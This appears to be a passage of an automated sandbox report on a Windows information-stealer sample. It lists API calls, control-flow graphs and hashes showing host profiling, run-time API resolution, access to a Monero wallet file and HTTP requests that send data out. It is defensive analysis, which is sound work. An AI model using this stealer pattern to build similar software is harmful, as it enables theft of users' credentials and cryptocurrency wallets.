                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: ef49a91caa2f65edddbc0428c2e755b1616996089d4732fd9cebce567260ac69
                                • Instruction ID: 011500871902e4f1d3040e3ac34048005fc65d979ca711e141f81c100a8e802e
                                • Opcode Fuzzy Hash: ef49a91caa2f65edddbc0428c2e755b1616996089d4732fd9cebce567260ac69
                                • Instruction Fuzzy Hash: E94112616C37047FE628FBA6AC4EFDF7A625F43708F587040A84062780DFB27505C5AA
                                Function 00E14880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 e14880-e14942 call e2a7a0 call e147b0 call e2a740 * 5 InternetOpenA StrCmpCA 816 e14944 801->816 817 e1494b-e1494f 801->817 816->817 818 e14955-e14acd call e28b60 call e2a920 call e2a8a0 call e2a800 * 2 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a920 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a920 call e2a8a0 call e2a800 * 2 InternetConnectA 817->818 819 e14ecb-e14ef3 InternetCloseHandle call e2aad0 call e19ac0 817->819 818->819 905 e14ad3-e14ad7 818->905 829 e14f32-e14fa2 call e28990 * 2 call e2a7a0 call e2a800 * 8 819->829 830 e14ef5-e14f2d call e2a820 call e2a9b0 call e2a8a0 call e2a800 819->830 830->829 906 e14ae5 905->906 907 e14ad9-e14ae3 905->907 908 e14aef-e14b22 HttpOpenRequestA 906->908 907->908 909 e14b28-e14e28 call e2a9b0 call e2a8a0 call e2a800 call e2a920 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a920 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a920 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a9b0 call e2a8a0 call e2a800 call e2a920 call e2a8a0 call e2a800 call e2a740 call e2a920 * 2 call e2a8a0 call e2a800 * 2 call e2aad0 lstrlen call e2aad0 * 2 lstrlen call e2aad0 HttpSendRequestA 908->909 910 e14ebe-e14ec5 InternetCloseHandle 908->910 1021 e14e32-e14e5c InternetReadFile 909->1021 910->819 1022 e14e67-e14eb9 InternetCloseHandle call e2a800 1021->1022 1023 e14e5e-e14e65 1021->1023 1022->910 1023->1022 1024 e14e69-e14ea7 call e2a9b0 call e2a8a0 call e2a800 1023->1024 1024->1021
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E14915
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E1493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E14ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E30DDB,00000000,?,?,00000000,?,",00000000,?,008FE500), ref: 00E14DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E14E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E14E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E14E49
                                • InternetCloseHandle.WININET(00000000), ref: 00E14EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00E14EC5
                                • HttpOpenRequestA.WININET(00000000,008FE550,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E14B15
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • InternetCloseHandle.WININET(00000000), ref: 00E14ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: e74a2a2606cfafa56caf4cbce10ecd35cb8294ed5a84290cd8b36268768887e4
                                • Instruction ID: 96261fc78c1bbdd9b4cd2ace36c4f4baa50dc9c58de1ce366bc75fc19f7d70e3
                                • Opcode Fuzzy Hash: e74a2a2606cfafa56caf4cbce10ecd35cb8294ed5a84290cd8b36268768887e4
                                • Instruction Fuzzy Hash: 1E12CC729102289BDB19EB50EC56FEEB7B8BF54300F5451A9F10672091DF742F89CB61
                                Function 00E278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00E2792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 619d5df449900247063f6861afc36b70d30f676199d747103c87944c850c6dec
                                • Instruction ID: 0c6208db697a2305f7100eafc7b1ebca078c551a2da88ef63c23db1dc51e0ff9
                                • Opcode Fuzzy Hash: 619d5df449900247063f6861afc36b70d30f676199d747103c87944c850c6dec
                                • Instruction Fuzzy Hash: 7A0186B1A08304EBC710DF94D945BABBBB8F744B21F104219F685F3280C77559408BA1
                                Function 00E27850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E2789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 2138d4e98ede46f1aefeec11465f7d936054fb811cb9649e953a6ffe4955b66e
                                • Instruction ID: 59daf29a0bec0d042eeba59b76aaea5ef83a8f851477f25c0bd156cd8bc78fb9
                                • Opcode Fuzzy Hash: 2138d4e98ede46f1aefeec11465f7d936054fb811cb9649e953a6ffe4955b66e
                                • Instruction Fuzzy Hash: 0FF04FB1E44208EBC714DF98DD49BAFBBB8FB08721F10025AFA45A3680C77919048BA1
                                Function 00E11160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 3ab710c7a19272a21e310c4f921c6961a0d3a6813be95a1e2f672c2809e30352
                                • Instruction ID: 4192294f47074cf4ce03edf6cd601cd5bae7dafeb124994993e3af8f3332dfc9
                                • Opcode Fuzzy Hash: 3ab710c7a19272a21e310c4f921c6961a0d3a6813be95a1e2f672c2809e30352
                                • Instruction Fuzzy Hash: 91D05E74A0030CDBCB10DFE0D8496DEBB78FB08311F001698D90673340EA3164C1CBA5
                                Function 00E29C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 e29c10-e29c1a 634 e29c20-e2a031 GetProcAddress * 43 633->634 635 e2a036-e2a0ca LoadLibraryA * 8 633->635 634->635 636 e2a146-e2a14d 635->636 637 e2a0cc-e2a141 GetProcAddress * 5 635->637 638 e2a153-e2a211 GetProcAddress * 8 636->638 639 e2a216-e2a21d 636->639 637->636 638->639 640 e2a298-e2a29f 639->640 641 e2a21f-e2a293 GetProcAddress * 5 639->641 642 e2a337-e2a33e 640->642 643 e2a2a5-e2a332 GetProcAddress * 6 640->643 641->640 644 e2a344-e2a41a GetProcAddress * 9 642->644 645 e2a41f-e2a426 642->645 643->642 644->645 646 e2a4a2-e2a4a9 645->646 647 e2a428-e2a49d GetProcAddress * 5 645->647 648 e2a4ab-e2a4d7 GetProcAddress * 2 646->648 649 e2a4dc-e2a4e3 646->649 647->646 648->649 650 e2a515-e2a51c 649->650 651 e2a4e5-e2a510 GetProcAddress * 2 649->651 652 e2a612-e2a619 650->652 653 e2a522-e2a60d GetProcAddress * 10 650->653 651->650 654 e2a61b-e2a678 GetProcAddress * 4 652->654 655 e2a67d-e2a684 652->655 653->652 654->655 656 e2a686-e2a699 GetProcAddress 655->656 657 e2a69e-e2a6a5 655->657 656->657 658 e2a6a7-e2a703 GetProcAddress * 4 657->658 659 e2a708-e2a709 657->659 658->659
                                APIs
                                • GetProcAddress.KERNEL32(75550000,008E6720), ref: 00E29C2D
                                • GetProcAddress.KERNEL32(75550000,008E6800), ref: 00E29C45
                                • GetProcAddress.KERNEL32(75550000,008F8F28), ref: 00E29C5E
                                • GetProcAddress.KERNEL32(75550000,008F8F40), ref: 00E29C76
                                • GetProcAddress.KERNEL32(75550000,008FCA20), ref: 00E29C8E
                                • GetProcAddress.KERNEL32(75550000,008FC840), ref: 00E29CA7
                                • GetProcAddress.KERNEL32(75550000,008EB478), ref: 00E29CBF
                                • GetProcAddress.KERNEL32(75550000,008FC9C0), ref: 00E29CD7
                                • GetProcAddress.KERNEL32(75550000,008FC9D8), ref: 00E29CF0
                                • GetProcAddress.KERNEL32(75550000,008FC8D0), ref: 00E29D08
                                • GetProcAddress.KERNEL32(75550000,008FC9F0), ref: 00E29D20
                                • GetProcAddress.KERNEL32(75550000,008E6820), ref: 00E29D39
                                • GetProcAddress.KERNEL32(75550000,008E6960), ref: 00E29D51
                                • GetProcAddress.KERNEL32(75550000,008E6840), ref: 00E29D69
                                • GetProcAddress.KERNEL32(75550000,008E6880), ref: 00E29D82
                                • GetProcAddress.KERNEL32(75550000,008FCAE0), ref: 00E29D9A
                                • GetProcAddress.KERNEL32(75550000,008FCAC8), ref: 00E29DB2
                                • GetProcAddress.KERNEL32(75550000,008EB4C8), ref: 00E29DCB
                                • GetProcAddress.KERNEL32(75550000,008E6980), ref: 00E29DE3
                                • GetProcAddress.KERNEL32(75550000,008FCA08), ref: 00E29DFB
                                • GetProcAddress.KERNEL32(75550000,008FC858), ref: 00E29E14
                                • GetProcAddress.KERNEL32(75550000,008FC870), ref: 00E29E2C
                                • GetProcAddress.KERNEL32(75550000,008FCA38), ref: 00E29E44
                                • GetProcAddress.KERNEL32(75550000,008E69A0), ref: 00E29E5D
                                • GetProcAddress.KERNEL32(75550000,008FC828), ref: 00E29E75
                                • GetProcAddress.KERNEL32(75550000,008FCA50), ref: 00E29E8D
                                • GetProcAddress.KERNEL32(75550000,008FCA98), ref: 00E29EA6
                                • GetProcAddress.KERNEL32(75550000,008FCA68), ref: 00E29EBE
                                • GetProcAddress.KERNEL32(75550000,008FCA80), ref: 00E29ED6
                                • GetProcAddress.KERNEL32(75550000,008FC888), ref: 00E29EEF
                                • GetProcAddress.KERNEL32(75550000,008FCAB0), ref: 00E29F07
                                • GetProcAddress.KERNEL32(75550000,008FCAF8), ref: 00E29F1F
                                • GetProcAddress.KERNEL32(75550000,008FC810), ref: 00E29F38
                                • GetProcAddress.KERNEL32(75550000,008F9FC8), ref: 00E29F50
                                • GetProcAddress.KERNEL32(75550000,008FC8A0), ref: 00E29F68
                                • GetProcAddress.KERNEL32(75550000,008FC8B8), ref: 00E29F81
                                • GetProcAddress.KERNEL32(75550000,008E69C0), ref: 00E29F99
                                • GetProcAddress.KERNEL32(75550000,008FC8E8), ref: 00E29FB1
                                • GetProcAddress.KERNEL32(75550000,008E69E0), ref: 00E29FCA
                                • GetProcAddress.KERNEL32(75550000,008FC900), ref: 00E29FE2
                                • GetProcAddress.KERNEL32(75550000,008FC918), ref: 00E29FFA
                                • GetProcAddress.KERNEL32(75550000,008E6420), ref: 00E2A013
                                • GetProcAddress.KERNEL32(75550000,008E6620), ref: 00E2A02B
                                • LoadLibraryA.KERNEL32(008FC930,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A03D
                                • LoadLibraryA.KERNEL32(008FC948,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A04E
                                • LoadLibraryA.KERNEL32(008FC960,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A060
                                • LoadLibraryA.KERNEL32(008FC978,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A072
                                • LoadLibraryA.KERNEL32(008FC990,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A083
                                • LoadLibraryA.KERNEL32(008FC9A8,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A095
                                • LoadLibraryA.KERNEL32(008FCC30,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A0A7
                                • LoadLibraryA.KERNEL32(008FCD98,?,00E25CA3,00E30AEB,?,?,?,?,?,?,?,?,?,?,00E30AEA,00E30AE3), ref: 00E2A0B8
                                • GetProcAddress.KERNEL32(75750000,008E6500), ref: 00E2A0DA
                                • GetProcAddress.KERNEL32(75750000,008FCB28), ref: 00E2A0F2
                                • GetProcAddress.KERNEL32(75750000,008F8900), ref: 00E2A10A
                                • GetProcAddress.KERNEL32(75750000,008FCB70), ref: 00E2A123
                                • GetProcAddress.KERNEL32(75750000,008E65A0), ref: 00E2A13B
                                • GetProcAddress.KERNEL32(73CC0000,008EB090), ref: 00E2A160
                                • GetProcAddress.KERNEL32(73CC0000,008E6360), ref: 00E2A179
                                • GetProcAddress.KERNEL32(73CC0000,008EAF50), ref: 00E2A191
                                • GetProcAddress.KERNEL32(73CC0000,008FCBB8), ref: 00E2A1A9
                                • GetProcAddress.KERNEL32(73CC0000,008FCDB0), ref: 00E2A1C2
                                • GetProcAddress.KERNEL32(73CC0000,008E63C0), ref: 00E2A1DA
                                • GetProcAddress.KERNEL32(73CC0000,008E63E0), ref: 00E2A1F2
                                • GetProcAddress.KERNEL32(73CC0000,008FCBD0), ref: 00E2A20B
                                • GetProcAddress.KERNEL32(757E0000,008E6640), ref: 00E2A22C
                                • GetProcAddress.KERNEL32(757E0000,008E6560), ref: 00E2A244
                                • GetProcAddress.KERNEL32(757E0000,008FCB88), ref: 00E2A25D
                                • GetProcAddress.KERNEL32(757E0000,008FCDC8), ref: 00E2A275
                                • GetProcAddress.KERNEL32(757E0000,008E6400), ref: 00E2A28D
                                • GetProcAddress.KERNEL32(758D0000,008EB180), ref: 00E2A2B3
                                • GetProcAddress.KERNEL32(758D0000,008EB1A8), ref: 00E2A2CB
                                • GetProcAddress.KERNEL32(758D0000,008FCD08), ref: 00E2A2E3
                                • GetProcAddress.KERNEL32(758D0000,008E6440), ref: 00E2A2FC
                                • GetProcAddress.KERNEL32(758D0000,008E6480), ref: 00E2A314
                                • GetProcAddress.KERNEL32(758D0000,008EAF78), ref: 00E2A32C
                                • GetProcAddress.KERNEL32(76BE0000,008FCB58), ref: 00E2A352
                                • GetProcAddress.KERNEL32(76BE0000,008E65E0), ref: 00E2A36A
                                • GetProcAddress.KERNEL32(76BE0000,008F8890), ref: 00E2A382
                                • GetProcAddress.KERNEL32(76BE0000,008FCBE8), ref: 00E2A39B
                                • GetProcAddress.KERNEL32(76BE0000,008FCC00), ref: 00E2A3B3
                                • GetProcAddress.KERNEL32(76BE0000,008E6540), ref: 00E2A3CB
                                • GetProcAddress.KERNEL32(76BE0000,008E64A0), ref: 00E2A3E4
                                • GetProcAddress.KERNEL32(76BE0000,008FCB40), ref: 00E2A3FC
                                • GetProcAddress.KERNEL32(76BE0000,008FCCC0), ref: 00E2A414
                                • GetProcAddress.KERNEL32(75670000,008E65C0), ref: 00E2A436
                                • GetProcAddress.KERNEL32(75670000,008FCBA0), ref: 00E2A44E
                                • GetProcAddress.KERNEL32(75670000,008FCDE0), ref: 00E2A466
                                • GetProcAddress.KERNEL32(75670000,008FCC18), ref: 00E2A47F
                                • GetProcAddress.KERNEL32(75670000,008FCD20), ref: 00E2A497
                                • GetProcAddress.KERNEL32(759D0000,008E62C0), ref: 00E2A4B8
                                • GetProcAddress.KERNEL32(759D0000,008E63A0), ref: 00E2A4D1
                                • GetProcAddress.KERNEL32(76D80000,008E64C0), ref: 00E2A4F2
                                • GetProcAddress.KERNEL32(76D80000,008FCC48), ref: 00E2A50A
                                • GetProcAddress.KERNEL32(6F5C0000,008E64E0), ref: 00E2A530
                                • GetProcAddress.KERNEL32(6F5C0000,008E6600), ref: 00E2A548
                                • GetProcAddress.KERNEL32(6F5C0000,008E6340), ref: 00E2A560
                                • GetProcAddress.KERNEL32(6F5C0000,008FCC60), ref: 00E2A579
                                • GetProcAddress.KERNEL32(6F5C0000,008E6320), ref: 00E2A591
                                • GetProcAddress.KERNEL32(6F5C0000,008E6660), ref: 00E2A5A9
                                • GetProcAddress.KERNEL32(6F5C0000,008E6280), ref: 00E2A5C2
                                • GetProcAddress.KERNEL32(6F5C0000,008E6460), ref: 00E2A5DA
                                • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00E2A5F1
                                • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00E2A607
                                • GetProcAddress.KERNEL32(75480000,008FCC78), ref: 00E2A629
